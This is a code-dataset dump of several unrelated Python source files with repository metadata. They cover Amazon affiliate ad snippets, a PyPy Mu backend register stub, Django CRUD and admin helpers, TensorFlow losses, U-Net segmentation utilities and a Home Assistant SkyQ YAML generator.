src="//ws-na.amazon-adsystem.com/widgets/q?ServiceVersion=20070822&OneJS=1&Operation=GetAdHtml&MarketPlace=BR&source=ac&ref=tf_til&ad_type=product_link&tracking_id=esteeuquero-20&marketplace=amazon®ion=BR&placement=B07ZZKRG9Y&asins=B07ZZKRG9Y&linkId=de11c3a8cfc5eeaac8a7764790a1e08c&show_border=false&link_opens_in_new_window=true&price_color=333333&title_color=0066c0&bg_color=ffffff"> </iframe>', "automotivo"], ["Wide Band O2 Datalogger - LSU 4.2 - Lambda/com Chicote 2m Fueltech", '<iframe style="width:120px;height:240px;" marginwidth="0" marginheight="0" scrolling="no" frameborder="0" src="//ws-na.amazon-adsystem.com/widgets/q?ServiceVersion=20070822&OneJS=1&Operation=GetAdHtml&MarketPlace=BR&source=ac&ref=tf_til&ad_type=product_link&tracking_id=esteeuquero-20&marketplace=amazon®ion=BR&placement=B07YNP9X7Y&asins=B07YNP9X7Y&linkId=b4ecfe37f1619e7dbb27628fdaaf465d&show_border=false&link_opens_in_new_window=true&price_color=333333&title_color=0066c0&bg_color=ffffff"> </iframe>', "automotivo"], ["SparkPRO-8 / com Chicote 2m", '<iframe style="width:120px;height:240px;" marginwidth="0" marginheight="0" scrolling="no" frameborder="0" src="//ws-na.amazon-adsystem.com/widgets/q?ServiceVersion=20070822&OneJS=1&Operation=GetAdHtml&MarketPlace=BR&source=ac&ref=tf_til&ad_type=product_link&tracking_id=esteeuquero-20&marketplace=amazon®ion=BR&placement=B07YNNWRG2&asins=B07YNNWRG2&linkId=6562ae45153f506125539da5db2a1c88&show_border=false&link_opens_in_new_window=true&price_color=333333&title_color=0066c0&bg_color=ffffff"> </iframe>', "automotivo"], ["SparkPRO-6 / com Chicote de 2m", '<iframe style="width:120px;height:240px;" marginwidth="0" marginheight="0" scrolling="no" frameborder="0" 
src="//ws-na.amazon-adsystem.com/widgets/q?ServiceVersion=20070822&OneJS=1&Operation=GetAdHtml&MarketPlace=BR&source=ac&ref=tf_til&ad_type=product_link&tracking_id=esteeuquero-20&marketplace=amazon®ion=BR&placement=B07YNP8PZY&asins=B07YNP8PZY&linkId=e5a699a49050cb41ea609aa2da3c7b9c&show_border=false&link_opens_in_new_window=true&price_color=333333&title_color=0066c0&bg_color=ffffff"> </iframe>', "automotivo"], ["SparkPRO-4 / com chicote de 2m", '<iframe style="width:120px;height:240px;" marginwidth="0" marginheight="0" scrolling="no" frameborder="0" src="//ws-na.amazon-adsystem.com/widgets/q?ServiceVersion=20070822&OneJS=1&Operation=GetAdHtml&MarketPlace=BR&source=ac&ref=tf_til&ad_type=product_link&tracking_id=esteeuquero-20&marketplace=amazon®ion=BR&placement=B07YNP9W2F&asins=B07YNP9W2F&linkId=3761746cc169a8fbc77f3dc03ff038be&show_border=false&link_opens_in_new_window=true&price_color=333333&title_color=0066c0&bg_color=ffffff"> </iframe>', "automotivo"], ["SparkPRO-2 / com Chicote de 2m", '<iframe style="width:120px;height:240px;" marginwidth="0" marginheight="0" scrolling="no" frameborder="0" src="//ws-na.amazon-adsystem.com/widgets/q?ServiceVersion=20070822&OneJS=1&Operation=GetAdHtml&MarketPlace=BR&source=ac&ref=tf_til&ad_type=product_link&tracking_id=esteeuquero-20&marketplace=amazon®ion=BR&placement=B07YNP28WB&asins=B07YNP28WB&linkId=ad5e56fbd4512989a14b8e027e563078&show_border=false&link_opens_in_new_window=true&price_color=333333&title_color=0066c0&bg_color=ffffff"> </iframe>', "automotivo"], ["Digital Air Fuel Meter", '<iframe style="width:120px;height:240px;" marginwidth="0" marginheight="0" scrolling="no" frameborder="0" src="//ws-na.amazon-adsystem.com/widgets/q?ServiceVersion=20070822&OneJS=1&Operation=GetAdHtml&MarketPlace=BR&source=ac&ref=tf_til&ad_type=product_link&tracking_id=esteeuquero-20&marketplace=amazon®ion=BR&placement=B07YNPG5VJ&asins=B07YNPG5VJ&linkId=51856d246ec0c66ae6e44cc19eb04622&show_border=false&link_opens_in_new_window=true&price_color=333333&title_color=0066c0&bg_color=ffffff"> </iframe>', "automotivo"], ["Wide Band O2 Meter Nano/Com chicote de 2m", '<iframe style="width:120px;height:240px;" marginwidth="0" marginheight="0" scrolling="no" frameborder="0" src="//ws-na.amazon-adsystem.com/widgets/q?ServiceVersion=20070822&OneJS=1&Operation=GetAdHtml&MarketPlace=BR&source=ac&ref=tf_til&ad_type=product_link&tracking_id=esteeuquero-20&marketplace=amazon®ion=BR&placement=B07YNPBHQ8&asins=B07YNPBHQ8&linkId=6f5bf549a5debfd2e0c5c76701de9616&show_border=false&link_opens_in_new_window=true&price_color=333333&title_color=0066c0&bg_color=ffffff"> </iframe>', "automotivo"], ["Clamper - Br / 2M", '<iframe style="width:120px;height:240px;" marginwidth="0" marginheight="0" scrolling="no" frameborder="0" src="//ws-na.amazon-adsystem.com/widgets/q?ServiceVersion=20070822&OneJS=1&Operation=GetAdHtml&MarketPlace=BR&source=ac&ref=tf_til&ad_type=product_link&tracking_id=esteeuquero-20&marketplace=amazon®ion=BR&placement=B07YNPMYCG&asins=B07YNPMYCG&linkId=9920e774c7bb1a8380a1f90ef2979fee&show_border=false&link_opens_in_new_window=true&price_color=333333&title_color=0066c0&bg_color=ffffff"> </iframe>', "automotivo"], ["Turbina Upgrade (400cv) Jetta Fusca 211cv Ea888 3a Geração", '<iframe style="width:120px;height:240px;" marginwidth="0" marginheight="0" scrolling="no" frameborder="0" 
src="//ws-na.amazon-adsystem.com/widgets/q?ServiceVersion=20070822&OneJS=1&Operation=GetAdHtml&MarketPlace=BR&source=ac&ref=tf_til&ad_type=product_link&tracking_id=esteeuquero-20&marketplace=amazon®ion=BR&placement=B0888SGZ4D&asins=B0888SGZ4D&linkId=c7f08d7ec0a82f64a790b8a7708a5e92&show_border=false&link_opens_in_new_window=true&price_color=333333&title_color=0066c0&bg_color=ffffff"> </iframe>', "automotivo"], ["CONJ CENTRAL TURBINA - AUDI Q5 2.0 TSI EA888-200/211CV", '<iframe style="width:120px;height:240px;" marginwidth="0" marginheight="0" scrolling="no" frameborder="0" src="//ws-na.amazon-adsystem.com/widgets/q?ServiceVersion=20070822&OneJS=1&Operation=GetAdHtml&MarketPlace=BR&source=ac&ref=tf_til&ad_type=product_link&tracking_id=esteeuquero-20&marketplace=amazon®ion=BR&placement=B083JKT1BH&asins=B083JKT1BH&linkId=4035edc7c5054dbb65e6f48f5009c7ac&show_border=false&link_opens_in_new_window=true&price_color=333333&title_color=0066c0&bg_color=ffffff"> </iframe>', "automotivo"], ["Echo Dot (3ª Geração): Smart Speaker com Alexa - Cor Preta", '<iframe style="width:120px;height:240px;" marginwidth="0" marginheight="0" scrolling="no" frameborder="0" src="//ws-na.amazon-adsystem.com/widgets/q?ServiceVersion=20070822&OneJS=1&Operation=GetAdHtml&MarketPlace=BR&source=ac&ref=tf_til&ad_type=product_link&tracking_id=esteeuquero-20&marketplace=amazon®ion=BR&placement=B07PDHSJ1H&asins=B07PDHSJ1H&linkId=f2fec788a0432b623bd85426817d0d3e&show_border=false&link_opens_in_new_window=true&price_color=333333&title_color=0066c0&bg_color=ffffff"> </iframe>', "iot"], ["Echo (3ª geração) - Smart Speaker com Alexa - Cor Azul", '<iframe style="width:120px;height:240px;" marginwidth="0" marginheight="0" scrolling="no" frameborder="0" src="//ws-na.amazon-adsystem.com/widgets/q?ServiceVersion=20070822&OneJS=1&Operation=GetAdHtml&MarketPlace=BR&source=ac&ref=tf_til&ad_type=product_link&tracking_id=esteeuquero-20&marketplace=amazon®ion=BR&placement=B07TZLF17T&asins=B07TZLF17T&linkId=34f0600d7d789a5141429a14233e4bab&show_border=false&link_opens_in_new_window=true&price_color=333333&title_color=0066c0&bg_color=ffffff"> </iframe>', "iot"], ["Novo Echo Dot (4ª Geração): Smart Speaker com Alexa - Cor Azul", '<iframe style="width:120px;height:240px;" marginwidth="0" marginheight="0" scrolling="no" frameborder="0" src="//ws-na.amazon-adsystem.com/widgets/q?ServiceVersion=20070822&OneJS=1&Operation=GetAdHtml&MarketPlace=BR&source=ac&ref=tf_til&ad_type=product_link&tracking_id=esteeuquero-20&marketplace=amazon®ion=BR&placement=B084KV8YRR&asins=B084KV8YRR&linkId=4a032d7efa13b15d6c4c55fa05a02b7b&show_border=false&link_opens_in_new_window=true&price_color=333333&title_color=0066c0&bg_color=ffffff"> </iframe>', "iot"], ["Novo Fire TV Stick Lite com Controle Remoto Lite por Voz com Alexa | Streaming em Full HD | Modelo 2020", '<iframe style="width:120px;height:240px;" marginwidth="0" marginheight="0" scrolling="no" frameborder="0" src="//ws-na.amazon-adsystem.com/widgets/q?ServiceVersion=20070822&OneJS=1&Operation=GetAdHtml&MarketPlace=BR&source=ac&ref=tf_til&ad_type=product_link&tracking_id=esteeuquero-20&marketplace=amazon®ion=BR&placement=B07ZZW745X&asins=B07ZZW745X&linkId=a3ea569a7df70e9e4e4b6d49365f616a&show_border=false&link_opens_in_new_window=true&price_color=333333&title_color=0066c0&bg_color=ffffff"> </iframe>', "iot"], ["Sonoff® T2 Us Interruptor Wifi Inteligente 3 Botões Touth Screen Wi-fi & Rf 433 Mhz, Funciona com Alexa", '<iframe style="width:120px;height:240px;" marginwidth="0" marginheight="0" scrolling="no" 
frameborder="0" src="//ws-na.amazon-adsystem.com/widgets/q?ServiceVersion=20070822&OneJS=1&Operation=GetAdHtml&MarketPlace=BR&source=ac&ref=tf_til&ad_type=product_link&tracking_id=esteeuquero-20&marketplace=amazon®ion=BR&placement=B07XRTNDNX&asins=B07XRTNDNX&linkId=f2fa5f01a0b48f660f452dd6ed593b9c&show_border=false&link_opens_in_new_window=true&price_color=333333&title_color=0066c0&bg_color=ffffff"> </iframe>', "iot"], ["Sonoff® T2 Us Interruptor Wifi Inteligente 2 Botões Touth Screen Wi-fi & Rf 433 Mhz, Funciona com Alexa", '<iframe style="width:120px;height:240px;" marginwidth="0" marginheight="0" scrolling="no" frameborder="0" src="//ws-na.amazon-adsystem.com/widgets/q?ServiceVersion=20070822&OneJS=1&Operation=GetAdHtml&MarketPlace=BR&source=ac&ref=tf_til&ad_type=product_link&tracking_id=esteeuquero-20&marketplace=amazon®ion=BR&placement=B07XRVN4ZK&asins=B07XRVN4ZK&linkId=12b2fa5290bcf58826fe920710104133&show_border=false&link_opens_in_new_window=true&price_color=333333&title_color=0066c0&bg_color=ffffff"> </iframe>', "iot"], [" Sonoff TX3 Interruptor Wifi, 3 Botões, Touch Screen, Funciona com Alexa - Preto", '<iframe style="width:120px;height:240px;" marginwidth="0" marginheight="0" scrolling="no" frameborder="0" src="//ws-na.amazon-adsystem.com/widgets/q?ServiceVersion=20070822&OneJS=1&Operation=GetAdHtml&MarketPlace=BR&source=ac&ref=tf_til&ad_type=product_link&tracking_id=esteeuquero-20&marketplace=amazon®ion=BR&placement=B0848PQMFL&asins=B0848PQMFL&linkId=16f1e8bf3b2b80c7774e4a5d4cfe14fe&show_border=false&link_opens_in_new_window=true&price_color=333333&title_color=0066c0&bg_color=ffffff"> </iframe>', "iot"], ["Sonoff basic- automação residencial", '<iframe style="width:120px;height:240px;" marginwidth="0" marginheight="0" scrolling="no" frameborder="0" src="//ws-na.amazon-adsystem.com/widgets/q?ServiceVersion=20070822&OneJS=1&Operation=GetAdHtml&MarketPlace=BR&source=ac&ref=tf_til&ad_type=product_link&tracking_id=esteeuquero-20&marketplace=amazon®ion=BR&placement=B077D3P9J2&asins=B077D3P9J2&linkId=5744ead441d0f693cb901403f6420e29&show_border=false&link_opens_in_new_window=true&price_color=333333&title_color=0066c0&bg_color=ffffff"> </iframe>', "iot"], ["Interruptor Inteligente Sonoff, 4 Canais, Funciona com Alexa", '<iframe style="width:120px;height:240px;" marginwidth="0" marginheight="0" scrolling="no" frameborder="0" src="//ws-na.amazon-adsystem.com/widgets/q?ServiceVersion=20070822&OneJS=1&Operation=GetAdHtml&MarketPlace=BR&source=ac&ref=tf_til&ad_type=product_link&tracking_id=esteeuquero-20&marketplace=amazon®ion=BR&placement=B07CZZB5VF&asins=B07CZZB5VF&linkId=2d80d47cb4459757e201e388174c0615&show_border=false&link_opens_in_new_window=true&price_color=333333&title_color=0066c0&bg_color=ffffff"> </iframe>', "iot"], ["Smart Controle Universal, Positivo Casa Inteligente, concentre todos os controles remotos no seu celular, Compatível com Alexa Smart Controle Universal", '<iframe style="width:120px;height:240px;" marginwidth="0" marginheight="0" scrolling="no" frameborder="0" src="//ws-na.amazon-adsystem.com/widgets/q?ServiceVersion=20070822&OneJS=1&Operation=GetAdHtml&MarketPlace=BR&source=ac&ref=tf_til&ad_type=product_link&tracking_id=esteeuquero-20&marketplace=amazon®ion=BR&placement=B085RNT8B9&asins=B085RNT8B9&linkId=a35cf940e71c66383bb0705f52c9e577&show_border=false&link_opens_in_new_window=true&price_color=333333&title_color=0066c0&bg_color=ffffff"> </iframe>', "iot"], ["Smart Plug Max Wi-Fi", '<iframe style="width:120px;height:240px;" marginwidth="0" marginheight="0" 
scrolling="no" frameborder="0" src="//ws-na.amazon-adsystem.com/widgets/q?ServiceVersion=20070822&OneJS=1&Operation=GetAdHtml&MarketPlace=BR&source=ac&ref=tf_til&ad_type=product_link&tracking_id=esteeuquero-20&marketplace=amazon®ion=BR&placement=B084J6Y2JF&asins=B084J6Y2JF&linkId=f1f38a453cbab525ee3c70c88e92ca88&show_border=false&link_opens_in_new_window=true&price_color=333333&title_color=0066c0&bg_color=ffffff"> </iframe>', "iot"]]
    return prod
| 5,050.8 | 25,197 | 0.818405 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 24,918 | 0.984745 |
cdcc403733cc344ed109e0132f133aabd50b5dc1 | 1,213 | py | Python | rpython/jit/backend/muvm/registers.py | wdv4758h/mu-client-pypy | d2fcc01f0b4fe3ffa232762124e3e6d38ed3a0cf | [
"Apache-2.0",
"OpenSSL"
]
| null | null | null | rpython/jit/backend/muvm/registers.py | wdv4758h/mu-client-pypy | d2fcc01f0b4fe3ffa232762124e3e6d38ed3a0cf | [
"Apache-2.0",
"OpenSSL"
]
| null | null | null | rpython/jit/backend/muvm/registers.py | wdv4758h/mu-client-pypy | d2fcc01f0b4fe3ffa232762124e3e6d38ed3a0cf | [
"Apache-2.0",
"OpenSSL"
]
| null | null | null | """ Modified version of ../muvm/registers.py. Will update as needed.
"""
#from rpython.jit.backend.arm.locations import VFPRegisterLocation
#from rpython.jit.backend.arm.locations import SVFPRegisterLocation
#from rpython.jit.backend.arm.locations import RegisterLocation
from rpython.jit.metainterp.history import (Const, ConstInt, ConstFloat,
ConstPtr,
INT, REF, FLOAT)
registers = []
vfpregisters = []
svfpregisters = []
all_regs = []
all_vfp_regs = vfpregisters[:]
argument_regs = caller_resp = []
callee_resp = []
callee_saved_registers = callee_resp
callee_restored_registers = callee_resp
vfp_argument_regs = caller_vfp_resp = []
svfp_argument_regs = []
callee_vfp_resp = []
callee_saved_vfp_registers = callee_vfp_resp
class Reg(object):
""" Default register type. """
type = None
size = 0
val = None
class IntReg(Reg):
type = INT
    def __init__(self, size=None, val=None):
self.size = size
self.val = val
class FPReg(Reg):
type = FLOAT
    def __init__(self, size=None, val=None):
assert size in (None, 32, 64)
self.size = size
self.val = val
| 25.270833 | 72 | 0.650453 | 385 | 0.317395 | 0 | 0 | 0 | 0 | 0 | 0 | 298 | 0.245672 |
cdcc7612e16b3989892d1765ee8591ffd8c61843 | 1,536 | py | Python | src/database/CRUD/create.py | gregory-chekler/api | 11ecbea945e7eb6fa677a0c0bb32bda51ba15f28 | [
"MIT"
]
| 2 | 2020-07-24T12:58:17.000Z | 2020-12-17T02:26:13.000Z | src/database/CRUD/create.py | gregory-chekler/api | 11ecbea945e7eb6fa677a0c0bb32bda51ba15f28 | [
"MIT"
]
| 214 | 2019-06-26T17:33:54.000Z | 2022-03-26T00:02:34.000Z | src/database/CRUD/create.py | massenergize/portalBackEnd | 7ed971b2be13901667a216d8c8a46f0bed6d6ccd | [
"MIT"
]
| 6 | 2020-03-13T20:29:06.000Z | 2021-08-20T16:15:08.000Z | """
This file contains code to post data to the database. This is meant to
centralize the insertion of data into the database so that multiple apps can
call on the methods in this file without having to define their own,
preventing code redundancy.
"""
from ..models import *
from ..utils.common import ensure_required_fields
from ..utils.create_factory import CreateFactory
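# Example usage (a hypothetical sketch; the field names and the CreateFactory
# contract are assumed from the calls below, not documented here):
#   args = {"title": "Recycle more", "community": community}
#   action = new_action(args)   # wraps CreateFactory(Action, args).create(...)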
def new_action(args):
factory = CreateFactory(Action, args)
return factory.create(Action, args)
def new_community(args):
factory = CreateFactory(Community, args)
return factory.create()
def new_event(args):
factory = CreateFactory(Event, args)
return factory.create()
def new_user_profile(args):
factory = CreateFactory(UserProfile, args)
return factory.create(UserProfile, args)
def new_location(args):
factory = CreateFactory(Location, args)
return factory.create()
def new_subscriber(args):
factory = CreateFactory(Subscriber, args)
return factory.create(Subscriber, args)
def new_billing_statement(args):
factory = CreateFactory(BillingStatement, args)
return factory.create(BillingStatement, args)
def new_slider(args):
factory = CreateFactory(Slider, args)
return factory.create(Slider, args)
def new_menu(args):
factory = CreateFactory(Menu, args)
return factory.create(Menu, args)
def new_page_section(args):
factory = CreateFactory(PageSection, args)
return factory.create(PageSection, args)
def new_page(args):
factory = CreateFactory(Page, args)
return factory.create(Page, args)
| 25.180328 | 76 | 0.76888 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 259 | 0.16862 |
cdccadfab450a4e9a57ce9f5439e430bde2038d3 | 527 | py | Python | tfutils/losses/losses.py | njchiang/tf-keras-utils | 6ea5e51ef3ca5729fbc71bf3cffecf4faec033dd | [
"MIT"
]
| null | null | null | tfutils/losses/losses.py | njchiang/tf-keras-utils | 6ea5e51ef3ca5729fbc71bf3cffecf4faec033dd | [
"MIT"
]
| null | null | null | tfutils/losses/losses.py | njchiang/tf-keras-utils | 6ea5e51ef3ca5729fbc71bf3cffecf4faec033dd | [
"MIT"
]
| null | null | null | # this actually won't work with keras... not exactly a keras utility
import tensorflow as tf
def ae_loss_fn(model, x, y, training=None):
pred = model(x, training)
mse = tf.keras.losses.MSE(y, pred)
return tf.reduce_mean(mse), pred
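# Example custom training step wired to ae_loss_fn (a minimal sketch; `model`,
# `opt`, and the (x, y) batch are assumed to be supplied by the caller):
#   with tf.GradientTape() as tape:
#       loss, pred = ae_loss_fn(model, x, y, training=True)
#   grads = tape.gradient(loss, model.trainable_variables)
#   opt.apply_gradients(zip(grads, model.trainable_variables))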
# function is untested
def vae_loss_fn(model, x, y, training=None):
z, m, v = model.encoder(x, training)
pred = model.decoder(z)
mse = tf.reduce_sum(tf.keras.losses.MSE(y, pred))
kld = -0.5 * tf.reduce_sum(1 + v - tf.pow(m, 2) - tf.exp(v))
return mse + kld, pred | 35.133333 | 68 | 0.660342 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 90 | 0.170778 |
cdccf6c01653163bb8ca38561bfba641eb360f29 | 834 | py | Python | src/data_generator/vocab_builder.py | luciencho/jddc_solo | efddf0885d5e3c640835874f70d57d25123de141 | [
"BSD-3-Clause"
]
| null | null | null | src/data_generator/vocab_builder.py | luciencho/jddc_solo | efddf0885d5e3c640835874f70d57d25123de141 | [
"BSD-3-Clause"
]
| null | null | null | src/data_generator/vocab_builder.py | luciencho/jddc_solo | efddf0885d5e3c640835874f70d57d25123de141 | [
"BSD-3-Clause"
]
| null | null | null | # coding:utf-8
from __future__ import unicode_literals
from __future__ import division
from __future__ import print_function
import os
from src.utils import utils
from src.data_generator import vocabulary
def process(hparam):
utils.raise_inexistence(hparam.tmp_dir)
tokenizer = vocabulary.Tokenizer(segment=hparam.segment)
all_data = []
paths = [os.path.join(hparam.tmp_dir, 'train_q.txt'),
os.path.join(hparam.tmp_dir, 'train_a.txt'),
os.path.join(hparam.tmp_dir, 'dev_q.txt'),
os.path.join(hparam.tmp_dir, 'dev_a.txt')]
vocab_path = os.path.join(hparam.tmp_dir, '{}.vcb'.format(hparam.vocab_size))
for path in paths:
utils.raise_inexistence(path)
all_data += utils.read_lines(path)
tokenizer.build_vocab(all_data, hparam.vocab_size, vocab_path)
| 33.36 | 81 | 0.713429 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 70 | 0.083933 |
cdd4efc2e23f55bb4467b8c8df8e0d1cdd72fa3d | 419 | py | Python | xas/queries/elastic.py | neuromore/msgxc | e74565a7991d80e5951ef22452521bcbca27fc92 | [
"Apache-2.0"
]
| 1 | 2020-03-30T22:14:21.000Z | 2020-03-30T22:14:21.000Z | xas/queries/elastic.py | neuromore/msgxc | e74565a7991d80e5951ef22452521bcbca27fc92 | [
"Apache-2.0"
]
| 12 | 2020-04-15T00:00:49.000Z | 2022-02-27T01:26:08.000Z | xas/queries/elastic.py | neuromore/msgxc | e74565a7991d80e5951ef22452521bcbca27fc92 | [
"Apache-2.0"
]
| 4 | 2020-01-16T11:29:38.000Z | 2020-04-03T09:43:40.000Z | from elasticsearch import Elasticsearch
# TODO: Not implemented yet
es = Elasticsearch(["localhost"], sniff_on_connection_fail=True, sniffer_timeout=60)
def threads_all():
res = es.search(index="mthreads", body={"query": {"match_all": {}}})
print("Got %d Hits:" % res['hits']['total'])
# for hit in res['hits']['hits']:
# print("%(timestamp)s %(author)s: %(text)s" % hit["_source"])
return res | 38.090909 | 84 | 0.649165 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 192 | 0.458234 |
cdd5f8ad7b2f42d4bfe80a22a6bf9fc481e565ca | 2,750 | py | Python | U-NET/utils.py | HarshZ26/Object-Detection | 1d73f6aeb7452b0b26bd2713e69f340d129a5ba5 | [
"MIT"
]
| 1 | 2022-03-23T15:49:02.000Z | 2022-03-23T15:49:02.000Z | U-NET/utils.py | HarshZ26/Object-Detection | 1d73f6aeb7452b0b26bd2713e69f340d129a5ba5 | [
"MIT"
]
| null | null | null | U-NET/utils.py | HarshZ26/Object-Detection | 1d73f6aeb7452b0b26bd2713e69f340d129a5ba5 | [
"MIT"
]
| null | null | null | from init import *
VOC_CLASSES = [
"background",
"aeroplane",
"bicycle",
"bird",
"boat",
"bottle",
"bus",
"car",
"cat",
"chair",
"cow",
"diningtable",
"dog",
"horse",
"motorbike",
"person",
"potted plant",
"sheep",
"sofa",
"train",
"tv/monitor",
]
VOC_COLORMAP = [
[0, 0, 0],
[128, 0, 0],
[0, 128, 0],
[128, 128, 0],
[0, 0, 128],
[128, 0, 128],
[0, 128, 128],
[128, 128, 128],
[64, 0, 0],
[192, 0, 0],
[64, 128, 0],
[192, 128, 0],
[64, 0, 128],
[192, 0, 128],
[64, 128, 128],
[192, 128, 128],
[0, 64, 0],
[128, 64, 0],
[0, 192, 0],
[128, 192, 0],
[0, 64, 128],
]
palette = np.array(VOC_COLORMAP)
custom_transforms = [transforms.Normalize(mean=[-0.485, -0.456,-0.406], std=[1/0.229, 1/0.224,1/0.225])]
inv_trans = torchvision.transforms.Compose(custom_transforms)
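# NOTE: inv_trans only approximately undoes the A.Normalize below; the exact
# inverse would be Normalize(mean=[-0.485/0.229, -0.456/0.224, -0.406/0.225],
# std=[1/0.229, 1/0.224, 1/0.225]).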
transform = A.Compose([A.Resize(512,512),
A.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225]),ToTensorV2()
])
def calculate_weight(loader):
weight_map = torch.zeros(21)
for i,(_,mask) in enumerate(loader):
mask = mask.permute(0,3,1,2)
index,counts = torch.unique(torch.argmax(mask,axis = 1),sorted = True,return_counts=True)
        for j in range(len(index)):  # j avoids shadowing the batch loop's i
            weight_map[index[j]] += counts[j]  # accumulate per-class pixel counts across batches
weight_map = (mask.size(2)*mask.size(3)*len(loader))/(weight_map)
return weight_map/21
def calculate_acc(grnd,predicted):
grnd = torch.argmax(grnd,axis = 1)
predicted = torch.argmax(predicted,axis = 1)
x = torch.eq(grnd,predicted).int()
    acc = torch.sum(x) / x.numel()  # fraction of correctly classified pixels over the batch
return acc
def collate_fn(batch):
    data = []   # filled with batch_size images through the loop below
    target = []
    for item in batch:  # each item is [image, label]
im = item[0]
open_cv_image = np.array(im)
open_cv_image = open_cv_image.copy()
transformed = transform(image=open_cv_image,mask = item[1])
im = transformed['image']
mask = transformed['mask']
data.append(im)
target.append(mask)
target = torch.stack(target,dim =0)
data = torch.stack(data,dim=0)
return [data, target]
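# Typical hookup (a sketch; `dataset` is assumed): pass this as the
# DataLoader's collate_fn so the albumentations pipeline runs per sample
# while batches are assembled:
#   loader = torch.utils.data.DataLoader(dataset, batch_size=4, collate_fn=collate_fn)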
def test_img(loader):
tes_img = iter(loader)
    images, masks = next(tes_img)  # Python 3: use the next() builtin
print("images",images.size())
print("labels",masks.size())
print(np.shape(images))
img = images[0].squeeze()
img = inv_trans(img)
img = img.numpy()
im2display = img.transpose((1,2,0))
    grnd_mask = masks.numpy()[0]  # first mask in the batch, shape (H, W, n_classes)
a1 = np.argmax(grnd_mask,axis = 2)
g_mask = palette[a1]
plt.imshow(im2display, interpolation='nearest')
plt.imshow(g_mask)
| 25.229358 | 105 | 0.577818 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 299 | 0.108727 |
cdd753cdba3af6ee31cf0c550e2ee7e5c881ebc9 | 2,898 | py | Python | custom_components/skyq/classes/switchmaker.py | TomBrien/Home_Assistant_SkyQ_MediaPlayer | 50f9ad0d3b7a3bc2acc652415ff59740bf3ace10 | [
"MIT"
]
| null | null | null | custom_components/skyq/classes/switchmaker.py | TomBrien/Home_Assistant_SkyQ_MediaPlayer | 50f9ad0d3b7a3bc2acc652415ff59740bf3ace10 | [
"MIT"
]
| null | null | null | custom_components/skyq/classes/switchmaker.py | TomBrien/Home_Assistant_SkyQ_MediaPlayer | 50f9ad0d3b7a3bc2acc652415ff59740bf3ace10 | [
"MIT"
]
| null | null | null | """
A utility function to generate yaml config for SkyQ media players.
To support easy usage with other home assistant integrations, e.g. google home
"""
import os.path as _path
import yaml
from ..const import CONST_ALIAS_FILENAME
class Switch_Maker:
"""The Switchmaker Class."""
def __init__(self, config_dir, entity_id, room, channels):
"""Initialise the Switchmaker."""
self._entity_id = entity_id
self._room = room
self._root = config_dir
if self._root[-1] != "/":
self._root += "/"
self._f = open(
self._root + "skyq" + self._room.replace(" ", "") + ".yaml", "w+"
)
if _path.isfile(self._root + CONST_ALIAS_FILENAME):
aliasfile = open(self._root + CONST_ALIAS_FILENAME, "r")
self._alias = yaml.full_load(aliasfile)
aliasfile.close()
self._addSwitch("pause", "pause", "media_pause")
self._addSwitch("play", "play", "media_play")
self._addSwitch("ff", "fastforward", "media_next_track")
self._addSwitch("rw", "rewind", "media_previous_track")
dedup_channels = list(dict.fromkeys(channels))
for ch in dedup_channels:
self._addSwitch(ch, ch, "select_source", True)
self._f.close()
def _addSwitch(self, switch, friendly_name, service, source=False):
"""Add switch to switches."""
source_switch = switch.replace("'", "''")
if self._alias:
friendly_name = self._findAlias(friendly_name)
else:
friendly_name = friendly_name.replace("'", "")
switch_name = (
"skyq_"
+ switch.replace(" ", "")
.replace("'", "")
.replace("+", "_")
.replace(".", "")
.replace("!", "")
.replace(":", "_")
.replace("/", "_")
.lower()
+ self._room.replace(" ", "").lower()
)
source_name = ""
if source:
source_name = " source: '" + source_switch + "'\n"
self._f.write(
" "
+ switch_name
+ ":\n"
+ " value_template: '{{\"off\"}}'\n"
+ " friendly_name: '"
+ friendly_name
+ " in the "
+ self._room
+ "'\n"
+ " turn_on:\n"
+ " service: media_player."
+ service
+ "\n"
+ " data:\n"
+ " entity_id: "
+ self._entity_id
+ "\n"
+ source_name
+ " turn_off:\n"
+ " service: script.placeholder\n"
)
def _findAlias(self, friendly_name):
try:
alias = self._alias[friendly_name]
except KeyError:
alias = friendly_name
return alias
| 30.1875 | 78 | 0.493444 | 2,661 | 0.918219 | 0 | 0 | 0 | 0 | 0 | 0 | 745 | 0.257074 |
cdd78b4b371ac658a03d1638d8afdbda0805a759 | 24,528 | py | Python | datawinners/accountmanagement/admin.py | ICT4H/dcs-web | fb0f53fad4401cfac1c1789ff28b9d5bda40c975 | [
"Apache-2.0"
]
| 1 | 2015-11-02T09:11:12.000Z | 2015-11-02T09:11:12.000Z | datawinners/accountmanagement/admin.py | ICT4H/dcs-web | fb0f53fad4401cfac1c1789ff28b9d5bda40c975 | [
"Apache-2.0"
]
| null | null | null | datawinners/accountmanagement/admin.py | ICT4H/dcs-web | fb0f53fad4401cfac1c1789ff28b9d5bda40c975 | [
"Apache-2.0"
]
| null | null | null | # vim: ai ts=4 sts=4 et sw=4 encoding=utf-8
import datetime
import logging
from django.contrib.auth.admin import UserAdmin
from django.contrib.auth.forms import UserChangeForm
from django.core.exceptions import ValidationError
from django.forms import CharField
from django.utils.translation import ugettext_lazy as _
from django.contrib import admin
from django.contrib.auth.models import User, Group
from django_digest.models import PartialDigest
from django.contrib import messages
from django.utils.safestring import mark_safe
from django.contrib.admin.views.main import ChangeList
from datawinners.common.admin.utils import get_text_search_filter, get_admin_panel_filter
from datawinners.project.submission.export import create_excel_response
from datawinners.search.index_utils import get_elasticsearch_handle
from forms import forms
from datawinners.accountmanagement.models import OrganizationSetting, SMSC, PaymentDetails, MessageTracker, Organization, NGOUserProfile, OutgoingNumberSetting
from mangrove.form_model.field import ExcelDate
from mangrove.utils.types import is_empty, is_not_empty
from datawinners.countrytotrialnumbermapping.models import Country, Network
from datawinners.utils import get_database_manager_for_org
from datawinners.feeds.database import feeds_db_for
from django.db.models import Q
admin.site.disable_action('delete_selected')
class DatawinnerAdmin(admin.ModelAdmin):
def has_delete_permission(self, request, obj=None):
return False
def has_add_permission(self, request):
return False
class OrganizationSettingAdmin(DatawinnerAdmin):
list_display = ('organization_name', 'organization_id', 'type', 'payment_details', 'activation_date', 'admin_email')
